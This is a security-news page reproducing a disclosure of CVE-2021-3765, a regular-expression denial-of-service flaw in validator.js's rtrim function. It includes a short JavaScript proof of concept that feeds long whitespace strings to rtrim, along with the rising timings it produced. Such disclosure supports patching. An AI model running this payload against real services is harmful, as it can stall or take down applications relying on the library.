Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-3765: Inefficient Regular Expression Complexity in validator.js

validator.js is vulnerable to Inefficient Regular Expression Complexity

CVE
Open in Source
#vulnerability#dos#js

Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It allows cause a denial of service when calling function 'rtrim’.

The ReDoS vulnerability is mainly due to the regex /(\s)+$/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var validator = require("validator")

for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = 'a'+' '.repeat(i*10000)+"a";
    validator.rtrim(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The Output

"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"

Reference

I have opened an issue before, but it is still not safe after fix.

For repair, you can refer to the rtrim function in package trim

Occurences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE